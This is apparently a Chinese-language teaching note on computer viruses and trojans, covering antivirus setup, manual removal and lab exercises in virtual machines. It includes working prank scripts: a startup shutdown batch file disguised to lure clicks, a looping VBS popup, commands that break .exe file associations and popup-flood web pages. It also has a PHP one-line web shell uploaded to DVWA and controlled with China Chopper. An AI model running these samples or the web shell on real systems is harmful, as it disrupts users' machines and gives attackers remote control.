计算机病毒案例分析

计算机病毒基本概述

计算机病毒是指编制者在计算机程序中插入的破坏计算机功能或破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码，具有自我繁殖，互相传染以及激活再生等生物病毒特征

DDos攻击是指利用分布式的客户端，向服务提供者发送大量看似合法的请求，消耗或占用大量资源，从而使服务器无法处理合法的请求

计算机病毒的特点：

• 传染性：计算机病毒具有自我复制的能力

• 破坏性：对系统产生不同程度的破坏

• 潜伏性：被感染后，不会马上发作而会隐藏起来

• 隐藏性：为了躲避杀毒软件，会自动隐藏

• 可触发性：当满足触发条件时才会产生破坏

计算机病毒分类：

• 按照传染对象：引导型病毒，文件型病毒，宏病毒

• 按照操作系统类型：DOS系统病毒，Windows系统病毒，Linux系统病毒，嵌入式操作系统病毒

• 按照破坏程度：良性病毒，恶性病毒

计算机病毒中毒现象：

• 电脑运行异常

• 杀毒软件失效

• 文件或文件夹无故消失

• 启动项中包含可疑启动项

• 应用程序图标被篡改

• 浏览器主页被篡改

计算机病毒的实验环境介绍

环境准备：

• 安装低版本操作系统：Win7， Win xp

• 使用VM虚拟机建立快照还原

• 断开网络

计算机病毒查杀方法

杀毒软件查杀病毒

任务7

使用火绒杀毒软件，熟悉相关配置，完成相关操作内容

杀毒软件配置

1. 场地设备要求

   计算机一台+虚拟计算机软件

2. 任务

   1. 点击火绒杀毒软件选择极速安装选项，等待安装成功

      

      

   2. 点击主界面中的防护中心，选择高级防护，开启自定义防护

      

   3. 开启高级防护下的IP黑名单

      

      点击IP黑名单，单击添加规则

      

      填入要禁用IP并选填备注，单击保存

      

   4. 开启并点击IP协议控制

      

      在IP协议控制面板中，点击添加规则，在规则模板处选择禁止ping入并保存

      

配置安全上网策略

1. 场地设备要求

   计算机一台+虚拟计算机软件

2. 任务

   1. 在火绒安全软件中打开安全设置-病毒防护

      

   2. 开启勒索病毒诱捕功能

      

   3. 设置深度查杀功能

      

   4. 在火绒安全中心主页点击防护中心选项，选择网络防护，点击恶意网址拦截

      

   5. 选择恶意网址拦截并添加规则

      

      

手工查杀病毒

• 查杀病毒现象

• 查杀病毒进程

• 查杀注册表

• 查杀主文件

• 查杀备份文件

计算机病毒案例详解

1. 恶作剧病毒（关机）

   shutdown -s -t 60 在1min后关机

   shutdown -a 取消上一条命令

   新建文本文件，内容为

    shutdown -s -t 60

   修改后缀为.bat，放到启动文件夹，循环启动/更改图标放桌面，诱使用户点击

2. 恶作剧病毒（表白）

   新建文本文件，内容为

    do
    msgbox"你愿意做我女朋友吗？"
    msgbox"就知道你愿意？"
    msgbox"真的不愿意吗，我好伤心啊！"
    msgbox"请接收我送的100朵玫瑰花吧！"
    msgbox"第1朵玫瑰花"
    msgbox"第2朵玫瑰花"
    msgbox"第3朵玫瑰花"
    msgbox"第4朵玫瑰花"
    msgbox"第5朵玫瑰花"
    msgbox"第6朵玫瑰花"
    msgbox"第7朵玫瑰花"
    msgbox"第8朵玫瑰花"
    msgbox"第9朵玫瑰花"
    msgbox"第10朵玫瑰花"
    msgbox"……"
    msgbox"你终于愿意接收我的爱了"
    msgbox"我马上过来找你，我的电话是13052052052，快联系我吧！"
    loop

   修改后缀为.vbs，运行

   结束进程：在任务管理器中结束进程wscript.exe

3. 显示或修改文件扩展名关联

   新建文本文件，内容为以下之一

    assoc.exe = txtfile
    assoc.exe = mp4file

   修改后缀为.bat，运行

   还原

    assoc.exe = exefile

4. 网页挂马、逻辑炸弹

   案例1：网页中有一个按钮，写“一按你就知道了！”

   新建文本文件，内容为

    <html>
        <head>
            <title>Loop Test</title>
            <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
            <script language="JavaScript"> 
                function pop() {
                    for(i=1;i<=5;i++) {
                        window.open('http://www.sohu.com','','width=400,height=460',
                                    'status=off','location=off','toolbar=off','scrollbars=off')      //定义打开网页的地址及窗口大小等
                    }
                }
            </script>                          
        </head>
        <body bgcolor="#FFFFFF" text="#000000"> 
            <form name="form">
                <p>
                    <input type="button" value="一按你就知道了" onClick="pop()" name="button" class="unnamed1">
                </p>
            </form>
        </body>
    </html> 

   修改后缀为.html，运行，在打开的网页中允许阻止的内容，点击按钮就会打开指定数量个指定网站的窗口

   案例2：网页中有一张图片，写“鼠标移动到这里就可以刷新”

   新建文本文件，内容为

    <html>
        <head>
            <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
            <title>欢迎光临我的网站！！</title>
        </head>
        <body>
            <script language="JavaScript">
                function pop() {
                    for(i=1;i<=20;i++) {
                        window.open('#.htm','','width=800,height=600','status=off',
                                    'location=off','toolbar=off','scrollbars=off')
                    }
                }
            </script>
            <form name="form">
                <p align="center"> 
                    <input type="button" value="鼠标移动到这里进行刷新操作！~" onmouseover="pop()" name="button" class="unnamed1">
                </p>
            </form>
            <img src=1.jpg>
        </body>
    </html>

   修改后缀为.html，运行，在打开的网页中允许阻止的内容，鼠标移至指定区域就会打开指定数量个窗口

   案例3：正常打开网页，但后台打开其他应用程序

   新建文本文件，内容为

    <html>
        <script language='VBScript'>        
            DIM bomp                            
            set bomp=CreateObject("WScript.Shell")     
            bomp.run("C:\Windows\notepad.exe")                  
        </script>                                   
    </html>

   修改后缀为.html，运行，在打开的网页中允许阻止的内容，就会同步打开指定的应用程序

5. 木马病毒

   木马是隐藏在正常程序中的具有特殊功能的恶意代码，具有破坏、删除、修改文件、发送木马记录键盘、实施DOS攻击、完全控制计算机等特殊功能的后门程序。隐藏在目标计算机中，随计算机自动启动并在某个端口监听来自控制端的控制信息。具有伪装性、隐藏性、破坏性、窃密性、再生性

   入侵主要途径：欺骗。包括更改图标、捆绑文件、欺骗下载程序。还可以通过网页挂马的方式，感染用户，也可能会利用某些系统漏洞入侵安装木马程序

   种类（按照发展历程）

   • 第一代木马伪装型病毒——将病毒伪装为一个合法的程序让其运行

   • 第二代木马网络传播型木马——具有伪装和传播两种功能，进行密码窃取，远程控制

   • 第三代木马连接方式上改进——利用端口反弹技术

   • 第四代木马进程隐藏方面——木马服务器端运行没有进程，网络操作插入到系统进程或者应用进程中完成

   种类（按照功能）

   • 破坏型木马——破坏并删除文件

   • 密码发送型木马——找到密码并发送到指定邮箱

   • 服务型木马——通过启动FTP服务或者建立共享目录，使黑客可以连接下载文件

   • DOS攻击型木马——将作为被黑客控制的肉鸡实施DOS攻击

   • 代理型木马——可使被入侵的计算机作为黑客发送攻击的跳板

   • 远程控制型木马——可使攻击者利用客户端软件进行完全控制

   工作原理

   • 传统连接技术

     木马采用C/S模式，分为客户端和服务器端木马程序

     服务器端程序在被攻击者电脑中，客户端在攻击者电脑中

     运行步骤：

     当服务器端的木马程序被执行后，会打开一个默认的端口进行监听，客户端会向服务器端主动提出一个连接请求，服务器端的木马程序就会自动运行，来应答客户端的请求，从而建立连接

     第一代伪装型病毒和第二代网络传播型木马都采用这种C/S客户端服务器的连接方式，属于客户端主动连接方式

     服务器端的远程主机开放监听端口，等待外部的连接请求，当入侵者需要与远程主机连接时，只要发出连接请求，就可以建立连接操作

   • 反弹端口技术

     防火墙技术的不断发展，可以有效拦截采用传统连接方式从外部主动发起的连接申请的木马程序。但防火墙对内部发起的连接外部的连接请求，却不会拒绝，认定为合法连接

     第三代和第四代就是利用这个缺点，由服务器端程序主动提出连接外部客户端的请求，在反弹式木马中，服务器是主动发起连接请求，客户端是被动连接的，根据IP地址的不同又可分为静态和动态两种

     当客户端的IP地址是静态不变的，生成服务器端程序时，输入静态的不变的IP地址

     当客户端和服务器端的IP地址都是动态变化的，入侵者利用一个代理服务器，保存客户端的IP地址和端口号，当IP地址发生变化时，只需要更新代理服务器中存放的IP地址和端口，服务器端先连接代理服务器，查询最新的客户端信息，然后再进行连接操作即可，两者均可以采用动态IP地址，并且可以穿透更加严密的防火墙

   • 线程插入技术

     应用程序运行时会产生进程，进程有进程标识符PID，系统为进程分配相关的资源，进程由很多线程组成，线程之间相互独立

     线程插入技术：木马作为一个线程插入一个正常运行的应用程序中，完全融入到系统的内核中，达到彻底隐藏的效果

   自启动方法

   • 添加到启动目录下，或者启动脚本中

   • 修改组策略

   • 修改注册表

   • 绑定文件

   木马文件具有本身的隐藏性，运行的隐藏性和通信的隐藏性

   危害

   • 盗用用户的信息

   • 利用即时通信软件传播病毒

   • 开设后门，电脑被黑客控制

   木马中毒症状

   • 计算机反应速度变慢

   • 硬盘不停的读写

   • 键盘鼠标不听使唤

   • 窗口突然被关闭

   • 窗口莫名被打开

   • 网络传输指示灯一直闪烁

   • 系统资源占用很多

   • 运行某个程序没有反应

   • 关闭某个程序时防火墙检测到有邮件发出

   防御步骤

   • 拔掉网线

   • 重启进入安全模式 F8

   • 使用杀毒软件杀毒

   • 手动查杀病毒

   • 重新安装操作系统

6. 一句话木马病毒（针对不同网站有不同写法）

   新建文本文件，内容为

    <?php @eval($_POST['value']);?> //针对php网站

   修改后缀为.php，设置DVWA的安全等级为Low，在DVWA的文件上传模块上传该文件

   

   再访问http://dvwa:90/hackable/uploads/abc.php运行一次该一次性木马病毒

   打开中国菜刀客户端，右键添加，输入http://dvwa:90/hackable/uploads/abc.php和关键字value，添加，连接成功即可进行文件管理，权限提升等

7. vbs病毒制作

   使用vir1.exe，按以下步骤自行配置

   
   

   

   

8. 熊猫烧香病毒

   危害

   1. 图标修改

   2. 生成autorun

   3. 局域网传播

   4. 启动关联

   5. 杀毒软件对抗

   6. 下载文件启动：会每隔20分钟，进入指定网站，下载病毒样本到本机并执行（所以查杀时第一件事是断网）

   查杀步骤

   1. 进入安全模式，查杀进程

   2. 删除主文件

   3. 修改注册表信息

   4. 查杀备份文件

   5. 破坏文件修复

   防范

   1. 杀毒软件

   2. 不要安装来源不明的软件

   3. 注意提升自己的安全意识和安全技能

任务8

远控木马实验

实验环境要求

1. 两个虚拟机操作系统（我使用的Win7+Win2019）

2. 关闭自带防火墙，实现两者之间的互通（使用VMNET1）并使用ping命令测试

3. 在Win2019中使用大白鲨生成木马病毒服务器端（指向本机IP地址）

4. 在Win7中释放木马病毒客户端（释放病毒自动上线）

5. 查看相关木马中毒情况